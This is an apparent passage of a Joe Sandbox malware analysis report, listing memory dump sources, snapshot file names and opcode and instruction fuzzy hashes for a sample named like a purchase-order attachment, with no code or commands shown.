                                              • Opcode Fuzzy Hash: 590bf2200e6ce6a2b9391f6c900911ec726179d2cb36e4e0880839ef60d19129
                                              • Instruction Fuzzy Hash: 20A10E34B10118DFCB04DFA4D999A9DBBB2FF88304F559599E406AB361DF31AC82CB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 38cc46f6ba04c44bb0b74732ca7bb6cfd2288e9937029e56b4eadbc6149ab1eb
                                              • Instruction ID: f8ca250564f1232ef919c86019e501143e0af6742a09c5791f5d0425ea0b6682
                                              • Opcode Fuzzy Hash: 38cc46f6ba04c44bb0b74732ca7bb6cfd2288e9937029e56b4eadbc6149ab1eb
                                              • Instruction Fuzzy Hash: A8812B75A00618CFDB24DFA9C484A9EBBF5FF88750B1585A9E806DB360DB31ED42CB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 20a1bfb715ad7d43cc9daa8329d41cf78e647f41951c66e11614fd5a7690e514
                                              • Instruction ID: e06aa0ffa4f3804f787c9204a23b247b77631c305b93fe3d9c82da5544cc3a96
                                              • Opcode Fuzzy Hash: 20a1bfb715ad7d43cc9daa8329d41cf78e647f41951c66e11614fd5a7690e514
                                              • Instruction Fuzzy Hash: 1A51C031B003008FD719AF75C858A2E7BB7BF89210B6449ADE4468B3A4DF35ED46CB91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 64fd27251c579249ac94f26c89213770889fae96e7e8e412be027b81fa060679
                                              • Instruction ID: f41e40ea7ecb8d69a4035271d2ebb0bc091d18d336bb4b30836bc709c3027ea3
                                              • Opcode Fuzzy Hash: 64fd27251c579249ac94f26c89213770889fae96e7e8e412be027b81fa060679
                                              • Instruction Fuzzy Hash: 11519F717042949FD714DF39C858B2E3BAABF89610B1944ADF40BCB3A1DE34DD468BA1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 44d8fe51b4b706414bfeb808b6c0d046e8c3ba51ce063f5ec3d30220dbfd3986
                                              • Instruction ID: 25d759cbbf38714ee6f01957bbfa0af15fbcd1a55ddf7eb1cd5c04804758d64a
                                              • Opcode Fuzzy Hash: 44d8fe51b4b706414bfeb808b6c0d046e8c3ba51ce063f5ec3d30220dbfd3986
                                              • Instruction Fuzzy Hash: 7A51BF34A41244CFDB14EF65D884BE9BBF2FB88312F24C5A6D905AB256E774AC41CB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 721f7b6b4aa27a4470ba89e30939ceb8de9e471288b171134906728fb53faf47
                                              • Instruction ID: 62dc812999d83a19ab526557eb8f33275ddf863e82182b082ecaeb8be329f3b4
                                              • Opcode Fuzzy Hash: 721f7b6b4aa27a4470ba89e30939ceb8de9e471288b171134906728fb53faf47
                                              • Instruction Fuzzy Hash: 5E51F539A006158FC710DF58D484A6EFBB6FF85320B198A99D5A99B381D730FC56CBD0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4d2a99c41ade68f11996a2538f110afdbf46f7f016064840c52d675fa96e51e3
                                              • Instruction ID: 2e213b3ef9843789d8d1a438bafa3f2b930361f3485a8280fc46e7d4077dd2ee
                                              • Opcode Fuzzy Hash: 4d2a99c41ade68f11996a2538f110afdbf46f7f016064840c52d675fa96e51e3
                                              • Instruction Fuzzy Hash: 8F513C76600104AFCB499FA8D814E697BB3FF8D31471A85D8E2099B372DB36DC61EB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: abc90d4562b21376f5e093711888b3f133b9d03113a6d8c592db196ee2d606e3
                                              • Instruction ID: 0f96eef74e6ec940cf16a11bb6c5f21157b00c117e3fb141a0b247bf4c8f5123
                                              • Opcode Fuzzy Hash: abc90d4562b21376f5e093711888b3f133b9d03113a6d8c592db196ee2d606e3
                                              • Instruction Fuzzy Hash: A6518F34A41244CFDB14EF69D844BEEB7F2FB88312F24C5A6D905AB256E774AC41CB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cfc3ea2fcc1c48246886b95a48826b939522ed9e3e26776bf73acf077e270b00
                                              • Instruction ID: 078ea31271844351fc7d5312136c7eeed64ecb3ac6da1089aa11bad9d6e07612
                                              • Opcode Fuzzy Hash: cfc3ea2fcc1c48246886b95a48826b939522ed9e3e26776bf73acf077e270b00
                                              • Instruction Fuzzy Hash: BE519830B106588FCB04EBA4C458A6EBBB7AFC9700F5049ADE443AB394DF709D45DB91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 70c8453e1af3ad701e4aa02e926cc3f0a01ca5805dffdf2bfe690952c8aaa68a
                                              • Instruction ID: de0a1ebeed219aa7fdc49e0313ca72714b24b2e90eb70533440b6f2a0a29fe7a
                                              • Opcode Fuzzy Hash: 70c8453e1af3ad701e4aa02e926cc3f0a01ca5805dffdf2bfe690952c8aaa68a
                                              • Instruction Fuzzy Hash: 2C51AE34B106099FCF04EF65E559AAEBBB6FF88705F004519F502973A0EF319986CB81
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 844945758da96ca4f9ee01a164b1b7d38e9e9e3a51f9277db81b5a55ad415e3a
                                              • Instruction ID: 7b518995c385dbd6d6b410f7533e1499ee3f8fdecd7ceee740bd5438eb2c8713
                                              • Opcode Fuzzy Hash: 844945758da96ca4f9ee01a164b1b7d38e9e9e3a51f9277db81b5a55ad415e3a
                                              • Instruction Fuzzy Hash: 9651AE34A41144CFDB44EF55D844BADB7F2FB88312F24C5A6D905AB266E774AC41CF50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 319cf15b34d059c8c92bac21ee35a57467f7de9a0b2ade653265fbd691a53041
                                              • Instruction ID: 9bcf658c339caa40f77c05d74189196017fc13c043c80f18d33ec3753996fb53
                                              • Opcode Fuzzy Hash: 319cf15b34d059c8c92bac21ee35a57467f7de9a0b2ade653265fbd691a53041
                                              • Instruction Fuzzy Hash: 3F416E713006109FD309DB69D869B2A7BEABFC9614F2044A9E246CB3A1DF71EC42C791
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 354bdc91592743c25b50e2e03eb2e65ad46b80017032f6d2b8b912bde47ed1eb
                                              • Instruction ID: 1decf6dc8d31312241052a918251f10d2a4d3756c49618750701e2684ee30b11
                                              • Opcode Fuzzy Hash: 354bdc91592743c25b50e2e03eb2e65ad46b80017032f6d2b8b912bde47ed1eb
                                              • Instruction Fuzzy Hash: 51413D38B04709CFD714DBA9D895F6ABBF2FB85700F1488ADE8469B294DB35D841CB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 845fcd15775186fe03790575f4f7fb864f1a0857763c69efe061fd89076bccaf
                                              • Instruction ID: ec2199855271d6d71fdd5aeaeec0d6f8c13d866e71ef20a9d0f8856a743e09ca
                                              • Opcode Fuzzy Hash: 845fcd15775186fe03790575f4f7fb864f1a0857763c69efe061fd89076bccaf
                                              • Instruction Fuzzy Hash: C241F374D41208EFCB04EFA6D488AEDBBB2FF89301F10946AE915A7354DB346945CF51
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f40d3cdedfb485dfb9133d244d1744e23aba83f0ca4494108d2ed21cbfd17288
                                              • Instruction ID: 069c62c770b66751fdbe8d243a01da5ffe7a3750e2903a86977cdaf7a4039857
                                              • Opcode Fuzzy Hash: f40d3cdedfb485dfb9133d244d1744e23aba83f0ca4494108d2ed21cbfd17288
                                              • Instruction Fuzzy Hash: AF3150713006109FD308DB69D5A9F2A77E6AFC8714F1044A8E606CB3A1DF71EC42C795
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 46eb787bd058d4a09f33e10800e6c625df1b4cc00b0d9c12d4929823d05d1740
                                              • Instruction ID: 8444f56199d9b6fe24eff220ccf56b91e1b915d7070ed4b23792b9444a988fd0
                                              • Opcode Fuzzy Hash: 46eb787bd058d4a09f33e10800e6c625df1b4cc00b0d9c12d4929823d05d1740
                                              • Instruction Fuzzy Hash: 1D31F536610104AFCB05DF59D998EA9BBB2FF48324B1640B8F60A9B372C771ED55DB40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e03f49e58df111c557b2874b95a47b86a2f8d6ed53fd0c2d22a5b6b9616357a8
                                              • Instruction ID: 22bcba448a328118eea7ce0f3b9bf90e43e13edd5217377e9b48b4c294f846d3
                                              • Opcode Fuzzy Hash: e03f49e58df111c557b2874b95a47b86a2f8d6ed53fd0c2d22a5b6b9616357a8
                                              • Instruction Fuzzy Hash: 54415E34A44245CFD704EF58C484BA9B7B2FB46312F1486B5D915AB7AADB34EC41CF50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5317622b6ba6c3dc030aa4546d5e116a7e804412d16a8415b805ca1bcbe3fa42
                                              • Instruction ID: 3f27d5f0c3d94573cab158a0f928e8ea1861079f2b31b19a1286486822c1c0a1
                                              • Opcode Fuzzy Hash: 5317622b6ba6c3dc030aa4546d5e116a7e804412d16a8415b805ca1bcbe3fa42
                                              • Instruction Fuzzy Hash: B5419379A0022ACFDB14DFA5C844ABEBFB1FF89311F0089A9E495D7250D731DA45CB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2aeb44e7bf03ff9fceca2ae29865756af7a7abc19047ea60f3227e7f8627a800
                                              • Instruction ID: 94c16e2e237084cdf4de7786d8004bf4cb09f39b5d3e08559146564d43c830cb
                                              • Opcode Fuzzy Hash: 2aeb44e7bf03ff9fceca2ae29865756af7a7abc19047ea60f3227e7f8627a800
                                              • Instruction Fuzzy Hash: B831D131700105DFCF049FA4D959A6DBBB2FF88310B1554A8EA4A9B3A1CA31DC92CB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f8a3efd0909b9f2987ef2fd1cb2fb2592f1abe0931a368380b0543593e02b500
                                              • Instruction ID: df2053e5dc6f69d0c4704ea5aaf1ee9e06b45803a321be7e1dbcfa43779c92a1
                                              • Opcode Fuzzy Hash: f8a3efd0909b9f2987ef2fd1cb2fb2592f1abe0931a368380b0543593e02b500
                                              • Instruction Fuzzy Hash: 2C21F5367042409FEB056E69D854A6E7B67EFC9320B54457EE909CB391DE718C11C7A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 487279928bb5d61feda14fcfeecca805ba4f04e5d7a695c14a4d422e6de220b0
                                              • Instruction ID: fdaf103117d1678367a924ac188b49b05c0bf0866ec556747fed1b61024c70e4
                                              • Opcode Fuzzy Hash: 487279928bb5d61feda14fcfeecca805ba4f04e5d7a695c14a4d422e6de220b0
                                              • Instruction Fuzzy Hash: A0410674A012148FEB24DB24DD95FA9BBB1BB49710F1049D9EA09AB3E0C631DD81CF50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485533832.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5ca0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 700fa9215cb7e6679717d52492e4ea0654bf27f410f24b2a97c8d43fd84daedf
                                              • Instruction ID: ef7bd3997c4e6cc4f47ddb91eee9514e166e56a8bcded1ce804a8150cbb7dd3f
                                              • Opcode Fuzzy Hash: 700fa9215cb7e6679717d52492e4ea0654bf27f410f24b2a97c8d43fd84daedf
                                              • Instruction Fuzzy Hash: 24316B36E0424ADFDB19CFA9C448BAEBFB1BB45309F148869D511A7290CB786981CF91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7df513844a11144fcd66cf195d4b97ec165086e1cd5abfd22d4ae444e6559ff4
                                              • Instruction ID: 950f57f6413f2bdf7e908c70fe1da76aade4b6147ce9edd90a479b1986768849
                                              • Opcode Fuzzy Hash: 7df513844a11144fcd66cf195d4b97ec165086e1cd5abfd22d4ae444e6559ff4
                                              • Instruction Fuzzy Hash: BE3169312002089FDF15CF29D884EAA3BB6FF88755F1585ADF806CB2A1DB71D995CB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c9a588c05a7f8f27ba23b384cb2f5a583306b8405aef773b5f8c9a96e8570fef
                                              • Instruction ID: c8f437add2adb971800ee67ac8c32872f71f99aad62ea6f4e5151ab0c914edf8
                                              • Opcode Fuzzy Hash: c9a588c05a7f8f27ba23b384cb2f5a583306b8405aef773b5f8c9a96e8570fef
                                              • Instruction Fuzzy Hash: 352102323082408FC3208BA9E445666BFE5EBC2729B5988FEE14EC7151DB31EC41C751
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ed81605771f3b70e78caffa532debf1e98667ef9d0393d6a98ce561b3b474f31
                                              • Instruction ID: a4f726751bf7b7bbaee7581e3db6922bcedce6042ef995c88491711ed592f45a
                                              • Opcode Fuzzy Hash: ed81605771f3b70e78caffa532debf1e98667ef9d0393d6a98ce561b3b474f31
                                              • Instruction Fuzzy Hash: 3231F4B0E042198FDB09CFAAD848AEEBBF2FB89311F10846AD415B7650D7705945CF91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f62298868dc45fad705490dbef1659567513fbd304b71c8b56b01c2794ceaa20
                                              • Instruction ID: 0154bf4613f3e44f79ea5593ee2e8d74c203786d4f095feae42b98bf21cef607
                                              • Opcode Fuzzy Hash: f62298868dc45fad705490dbef1659567513fbd304b71c8b56b01c2794ceaa20
                                              • Instruction Fuzzy Hash: 7631F2B4E002098FDB09CFAAD848BEEBBF2FB89310F14846AD415B7654D7709949CF91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: be2432990c93cb9e53b35aac05f44df2040a4b5c5781a8983a2e5196a5df7591
                                              • Instruction ID: b24e13b3d313c06f88dc81bd4b8dc612b2872ace2050aa70c6dd7b4e2c1fe21f
                                              • Opcode Fuzzy Hash: be2432990c93cb9e53b35aac05f44df2040a4b5c5781a8983a2e5196a5df7591
                                              • Instruction Fuzzy Hash: D631B134A44105CFEB14EF94D4447E977F2FB88315FA895B6C00DA7254D7B49882CB66
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 389d5a3d60a00ad091a49f924db48d5ebbf5ebaa5a3a4f67b2965b9bcd0eccff
                                              • Instruction ID: 05a555f645891faa276519070570f41e3e947b5a4c41a800fcb9f805b1c4aec2
                                              • Opcode Fuzzy Hash: 389d5a3d60a00ad091a49f924db48d5ebbf5ebaa5a3a4f67b2965b9bcd0eccff
                                              • Instruction Fuzzy Hash: 76315A74E04609DFDB44CFAAD440AAEFBF6EB89300F11D469D829A3358E7345946CF90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ef58e1c8c983a29ce0bd18f62ce118e282a1566043999485442ce8de822a5e45
                                              • Instruction ID: dec1db0e72b692aac26d5ee76dea70dbb35c6f233db8d232c4dc7c6a04e86d33
                                              • Opcode Fuzzy Hash: ef58e1c8c983a29ce0bd18f62ce118e282a1566043999485442ce8de822a5e45
                                              • Instruction Fuzzy Hash: 1B21A3317082959FDB11DF36D858A293FAABF8561170948FDF847CB291DA34D90187A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b8967f98506bb8d8732cad158cfb4878f1c6292ec2dff586573be4ccc8858125
                                              • Instruction ID: d80984e3cba1c7147b9eff40929878aedf67b44b3989ac957dc38841d6bd5672
                                              • Opcode Fuzzy Hash: b8967f98506bb8d8732cad158cfb4878f1c6292ec2dff586573be4ccc8858125
                                              • Instruction Fuzzy Hash: 01215936600148AFCB05CF99E898D99BFB2FF8C310B0644E9F20A9B272D771E915DB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5fe21da081461ea30038f5935e065a6741a0196842f86f1c00356e3714426d3b
                                              • Instruction ID: 4c7366365b5c4ad58e11cbe9ee22f9da62be3ca80f9a6105a540bf48737029ba
                                              • Opcode Fuzzy Hash: 5fe21da081461ea30038f5935e065a6741a0196842f86f1c00356e3714426d3b
                                              • Instruction Fuzzy Hash: CF31D2B4D08609DFCB09CFA6C548BAEBBF6BB49300F1094A9D419E7390D3749A80CF54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 31a7b3a9a5c3de14f7e9091b83443e8c3c5bed5e0d5255b6958b1668c4390d63
                                              • Instruction ID: 5b0c472a7e2e5a3ad858b92d05d75e6ea550893dffacd4fee39c3cc3250162ff
                                              • Opcode Fuzzy Hash: 31a7b3a9a5c3de14f7e9091b83443e8c3c5bed5e0d5255b6958b1668c4390d63
                                              • Instruction Fuzzy Hash: 3B217A35E04209DFDF14DFB5C494BAEBBF5AB44242F10C4AAE519D7290E734CA50CB91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2c3462a6d5b4e4280374528b5c35bc800abefc5302718b5c1ea04b4bf36e5af6
                                              • Instruction ID: 8f5ea60eb8dad95cbf4f8934328273fa6004f05f892df8087f7a1bc7c4a37d44
                                              • Opcode Fuzzy Hash: 2c3462a6d5b4e4280374528b5c35bc800abefc5302718b5c1ea04b4bf36e5af6
                                              • Instruction Fuzzy Hash: 8E311274E00208DFCB09DFAAE8506EEBBF2FF88211F10806AE416A7364DB755951DF90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 07d3c0cc21a0102b51652d232c8f6579082a114f69f0df453bab5a81b0611152
                                              • Instruction ID: dc92dcd292f78dabe8b39bcdc866502e3ca684a1667c2d7a95b7f81560e82f67
                                              • Opcode Fuzzy Hash: 07d3c0cc21a0102b51652d232c8f6579082a114f69f0df453bab5a81b0611152
                                              • Instruction Fuzzy Hash: 85216D703042559FCB05CF2AC884AAA7FE6BF8E200B098899FC45CB361DA31ED51CB20
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472191074.000000000265D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0265D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_265d000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ee1f78029dc4fa480d9d666af16a094ec412f21b94d13f3407bfd6a6390fd05c
                                              • Instruction ID: 7d2e89ec7a4204e6c085864c0591881c45c45f4c8586c64037746804ca3b6339
                                              • Opcode Fuzzy Hash: ee1f78029dc4fa480d9d666af16a094ec412f21b94d13f3407bfd6a6390fd05c
                                              • Instruction Fuzzy Hash: 8E21F2B2504284DFEB14EF14D9C4B2ABB65FB88714F24C569EC090B286C336D857CBA2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: def6094195b33aff40d52468de17f4573497094a0d75f98d1fc1098423ffb331
